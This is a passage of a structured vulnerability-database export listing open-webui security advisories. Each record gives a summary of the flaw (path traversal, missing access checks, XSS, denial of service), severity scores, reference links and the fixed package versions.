scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45675
4
reference_url https://github.com/open-webui/open-webui/pull/23626
reference_id 23626
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:45Z/
url https://github.com/open-webui/open-webui/pull/23626
5
reference_url https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
reference_id 96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:45Z/
url https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
6
reference_url https://github.com/advisories/GHSA-h3ww-q6xx-w7x3
reference_id GHSA-h3ww-q6xx-w7x3
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h3ww-q6xx-w7x3
7
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3
reference_id GHSA-h3ww-q6xx-w7x3
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:45Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45675, GHSA-h3ww-q6xx-w7x3
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-t571-d65a-cyb2
55
url VCID-tz2k-gazs-mqgd
vulnerability_id VCID-tz2k-gazs-mqgd
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.10, when uploading an audio file, the name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission. This vulnerability is fixed in 0.6.10.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44565
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.05947
published_at 2026-06-14T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05942
published_at 2026-06-11T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05955
published_at 2026-06-13T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05964
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44565
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44565
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44565
3
reference_url https://github.com/advisories/GHSA-j3fw-wc48-29g3
reference_id GHSA-j3fw-wc48-29g3
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j3fw-wc48-29g3
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-j3fw-wc48-29g3
reference_id GHSA-j3fw-wc48-29g3
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:52:24Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-j3fw-wc48-29g3
fixed_packages
0
url pkg:pypi/open-webui@0.6.10
purl pkg:pypi/open-webui@0.6.10
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k17g-bd9g-67f7
32
vulnerability VCID-k9jf-5jzd-pkge
33
vulnerability VCID-mn21-kwuu-w7by
34
vulnerability VCID-n4ma-zcpv-5fbp
35
vulnerability VCID-nxvm-97r4-6ybz
36
vulnerability VCID-pkds-1xgn-q3bv
37
vulnerability VCID-pvep-chj7-ekeg
38
vulnerability VCID-pwsg-72yy-quhk
39
vulnerability VCID-q682-k826-efhv
40
vulnerability VCID-qgfh-7u8n-y7c7
41
vulnerability VCID-qjt1-zxx8-r7ht
42
vulnerability VCID-r7vt-4bqm-f7hb
43
vulnerability VCID-reqw-pfm8-c7g5
44
vulnerability VCID-rhhj-rccv-87hw
45
vulnerability VCID-s625-eg1w-gfd1
46
vulnerability VCID-t571-d65a-cyb2
47
vulnerability VCID-u25g-p4nx-gqd1
48
vulnerability VCID-ujye-g4rj-8be5
49
vulnerability VCID-um53-kf7u-kkg6
50
vulnerability VCID-vghe-uuzj-m7cu
51
vulnerability VCID-vkx3-71kv-sugt
52
vulnerability VCID-w2vd-r3hr-w3bt
53
vulnerability VCID-wb88-83cj-ffhy
54
vulnerability VCID-wcz4-vwx4-tufb
55
vulnerability VCID-yug9-shts-kufb
56
vulnerability VCID-yysb-dk2k-f7g4
57
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.10
aliases CVE-2026-44565, GHSA-j3fw-wc48-29g3
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tz2k-gazs-mqgd
56
url VCID-u25g-p4nx-gqd1
vulnerability_id VCID-u25g-p4nx-gqd1
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can overwrite any file's content by ID through the `POST /api/v1/retrieval/process/files/batch` endpoint. The endpoint performs no ownership check, so a regular user with read access to a shared knowledge base can obtain file UUIDs via `GET /api/v1/knowledge/{id}/files` and then overwrite those files, escalating from read to write. The overwritten content is served to the LLM via RAG, meaning the attacker controls what the model tells other users. Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28788
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05269
published_at 2026-06-14T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.0527
published_at 2026-06-11T12:55:00Z
2
value 0.00019
scoring_system epss
scoring_elements 0.05279
published_at 2026-06-13T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.05286
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28788
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28788
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28788
4
reference_url https://github.com/advisories/GHSA-jjp7-g2jw-wh3j
reference_id GHSA-jjp7-g2jw-wh3j
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjp7-g2jw-wh3j
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jjp7-g2jw-wh3j
reference_id GHSA-jjp7-g2jw-wh3j
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T20:08:10Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jjp7-g2jw-wh3j
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-28788, GHSA-jjp7-g2jw-wh3j
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u25g-p4nx-gqd1
57
url VCID-ujye-g4rj-8be5
vulnerability_id VCID-ujye-g4rj-8be5
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, in standard channels (i.e., channels whose channel.type is neither group nor dm), the endpoint POST /api/v1/channels/{channel_id}/messages/{message_id}/update can be accessed with read permission only. When access_control is set to None, the authorization check has_access(..., type="read") evaluates to True, allowing users who are not the message owner to update messages. As a result, unauthorized modification of other users’ messages is possible. This vulnerability is fixed in 0.8.6.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44571
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.0146
published_at 2026-06-12T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01475
published_at 2026-06-14T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01458
published_at 2026-06-11T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01466
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44571
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44571
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44571
3
reference_url https://github.com/advisories/GHSA-jgj3-r8hr-9pjw
reference_id GHSA-jgj3-r8hr-9pjw
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jgj3-r8hr-9pjw
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jgj3-r8hr-9pjw
reference_id GHSA-jgj3-r8hr-9pjw
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:18:47Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jgj3-r8hr-9pjw
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-44571, GHSA-jgj3-r8hr-9pjw
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ujye-g4rj-8be5
58
url VCID-um53-kf7u-kkg6
vulnerability_id VCID-um53-kf7u-kkg6
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.11, there is a broken access control vulnerability in tool values. This issue has been patched in version 0.8.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-34222
reference_id
reference_type
scores
0
value 0.00016
scoring_system epss
scoring_elements 0.04101
published_at 2026-06-13T12:55:00Z
1
value 0.00016
scoring_system epss
scoring_elements 0.04111
published_at 2026-06-14T12:55:00Z
2
value 0.00016
scoring_system epss
scoring_elements 0.04093
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-34222
1
reference_url http://seclists.org/fulldisclosure/2026/Apr/4
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://seclists.org/fulldisclosure/2026/Apr/4
2
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-34222
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-34222
4
reference_url https://github.com/advisories/GHSA-7429-hxcv-268m
reference_id GHSA-7429-hxcv-268m
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7429-hxcv-268m
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-7429-hxcv-268m
reference_id GHSA-7429-hxcv-268m
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:03:22Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-7429-hxcv-268m
6
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.11
reference_id v0.8.11
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:03:22Z/
url https://github.com/open-webui/open-webui/releases/tag/v0.8.11
fixed_packages
0
url pkg:pypi/open-webui@0.8.11
purl pkg:pypi/open-webui@0.8.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-8nzh-cpda-dkca
13
vulnerability VCID-8y4k-pj2n-8uhm
14
vulnerability VCID-chug-ma8r-cucc
15
vulnerability VCID-cw4k-3s8z-uqh8
16
vulnerability VCID-dz6g-jgmg-wqce
17
vulnerability VCID-dzh3-rqx4-fqhv
18
vulnerability VCID-ef1t-pxjm-j7cz
19
vulnerability VCID-hj5f-yk3y-ffdg
20
vulnerability VCID-jfs9-dps1-27a2
21
vulnerability VCID-n4ma-zcpv-5fbp
22
vulnerability VCID-nxvm-97r4-6ybz
23
vulnerability VCID-pkds-1xgn-q3bv
24
vulnerability VCID-q682-k826-efhv
25
vulnerability VCID-qgfh-7u8n-y7c7
26
vulnerability VCID-qjt1-zxx8-r7ht
27
vulnerability VCID-r7vt-4bqm-f7hb
28
vulnerability VCID-reqw-pfm8-c7g5
29
vulnerability VCID-rhhj-rccv-87hw
30
vulnerability VCID-s625-eg1w-gfd1
31
vulnerability VCID-t571-d65a-cyb2
32
vulnerability VCID-vghe-uuzj-m7cu
33
vulnerability VCID-vkx3-71kv-sugt
34
vulnerability VCID-w2vd-r3hr-w3bt
35
vulnerability VCID-wcz4-vwx4-tufb
36
vulnerability VCID-yug9-shts-kufb
37
vulnerability VCID-yysb-dk2k-f7g4
38
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11
aliases CVE-2026-34222, GHSA-7429-hxcv-268m
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-um53-kf7u-kkg6
59
url VCID-vghe-uuzj-m7cu
vulnerability_id VCID-vghe-uuzj-m7cu
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured "Pending User Overlay Content" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44568
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10105
published_at 2026-06-14T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10069
published_at 2026-06-11T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.1012
published_at 2026-06-13T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10115
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44568
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44568
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44568
3
reference_url https://github.com/advisories/GHSA-fq3v-xjjx-95rc
reference_id GHSA-fq3v-xjjx-95rc
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fq3v-xjjx-95rc
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc
reference_id GHSA-fq3v-xjjx-95rc
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:18:40Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44568, GHSA-fq3v-xjjx-95rc
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vghe-uuzj-m7cu
60
url VCID-vj38-mn12-v7br
vulnerability_id VCID-vj38-mn12-v7br
summary In version 0.3.32 of open-webui/open-webui, the absence of authentication mechanisms allows any unauthenticated attacker to access the `api/v1/utils/code/format` endpoint. If a malicious actor sends a POST request with an excessively high volume of content, the server could become completely unresponsive. This could lead to severe performance issues, causing the server to become unresponsive or experience significant degradation, ultimately resulting in service interruptions for legitimate users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-12537
reference_id
reference_type
scores
0
value 0.02671
scoring_system epss
scoring_elements 0.86203
published_at 2026-06-13T12:55:00Z
1
value 0.02671
scoring_system epss
scoring_elements 0.86201
published_at 2026-06-14T12:55:00Z
2
value 0.02671
scoring_system epss
scoring_elements 0.86142
published_at 2026-06-11T12:55:00Z
3
value 0.02671
scoring_system epss
scoring_elements 0.86192
